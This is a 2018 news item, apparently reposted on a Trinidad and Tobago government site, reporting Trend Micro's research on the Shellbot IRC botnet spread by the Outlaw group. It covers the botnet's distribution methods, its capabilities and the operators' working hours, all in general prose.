Government of the Republic of Trinidad and Tobago                                                                                                                                        


News

Shellbot Botnet Targets Linux, Android Devices

5th November 2018

An IRC bot built using Pearl is targeting Internet of Things (IoT) devices and Linux servers, but can also affect Windows systems and Android devices, Trend Micro warns.

Dubbed Shellbot, the malware is being distributed by a threat group called Outlaw, which recently compromised FTP servers of a Japanese art institution and a Bangladeshi government site. The hackers linked compromised servers to a high availability cluster to host an IRC bouncer and control the botnet.

Previously, the botnet was being distributed via an exploit targeting the ShellShock vulnerability, hence its name. Last month, IBM observed attacks targeting the Drupalgeddon2 vulnerability (CVE-2018-7600) to distribute the botnet.

The campaign Trend Micro’s security researchers investigated, however, leveraged previously brute-forced or compromised hosts for distribution purposes. The bot was observed targeting Ubuntu and Android devices.

By looking at the botnet’s command and control (C&C) traffic, the security researchers found the IRC channel’s information and discovered around 142 hosts in the channel at the first infection.

To infect hosts, the malware first runs a command on the target, to verify that it accepts commands from the command-line interface (CLI). Next, the working directory is changed to “/tmp” and the downloaded payload is run with Perl interpreter. The payload is removed in the final step.

Once the Shellbot backdoor is up and running on the infected system, the IRC channel’s administrator can send commands to the host, to perform a port scan and various forms of distributed denial of service (DDoS), to download a file, get information about other machines, or send operating system (OS) information and a list of certain running processes.

The security researchers also discovered that the attackers would often modify the contents of the files hosted on the C&C server. The modification, deletion and addition of files mostly happened during daytime in Central European Time/CET, but never at night or on weekends.

The use of an IRC bot isn’t a novel tactic, especially with the code used in these attacks being available online, Trend Micro notes. The operation targeted big companies, but the group hasn’t engaged in widespread attacks, the security researchers also point out.